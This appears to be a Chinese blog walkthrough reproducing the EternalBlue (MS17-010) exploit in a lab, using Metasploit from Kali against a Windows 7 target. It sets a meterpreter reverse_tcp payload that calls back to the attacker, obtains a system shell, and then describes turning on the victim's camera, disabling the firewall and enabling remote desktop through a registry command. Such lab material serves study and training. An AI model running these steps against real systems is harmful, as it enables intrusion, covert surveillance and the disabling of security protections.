【漏洞复现】永恒之蓝漏洞

永恒之蓝漏洞复现


\

使用msfconsole来对ms17-010来进行扫描和利用

靶机:win7-x64

测试机:kali

扫描ms17-010漏洞

  1. 在kali中启动使用msfconsole启动msfconsole
  2. 使用search ms17-010搜索关于ms17-010的模块在这里插入图片描述
  3. 先调用搜索到的模块,再查看搜索模块的配置选项在这里插入图片描述
  4. 需要设置IP地址,确认设置信息都没用遗漏后,运行扫描在这里插入图片描述
  5. 发现漏洞。可以使用back退回

利用ms17-010漏洞

  1. 还是再msf中调用攻击模块,并查看选项
    在这里插入图片描述

  2. 对选项进行相关的配置,确认没有遗漏后,就可以执行

    set payload windows/x64/meterpreter/reverse_tcp
    set rhost x.x.x.x //靶机IP
    set lhost x.x.x.x //测试机IP
    

在这里插入图片描述
3. 执行完成后,输入 shell 就可以获得系统的shell权限

在这里插入图片描述

获得管理员权限后的操作

可以打开对方的摄像头
*
在这里插入图片描述

  • 可以使用命令关闭防火请,netsh advfirewall set allprofiles state off 在这里插入图片描述

  • 可以使用命令打开3389端口

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    开启允许远程控制,并且确认3389端口开启
    在这里插入图片描述

    在cmd中使用secpol.msc打开本地安全策略,关闭拒绝在这里插入图片描述
    远程登陆桌面成功

    在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值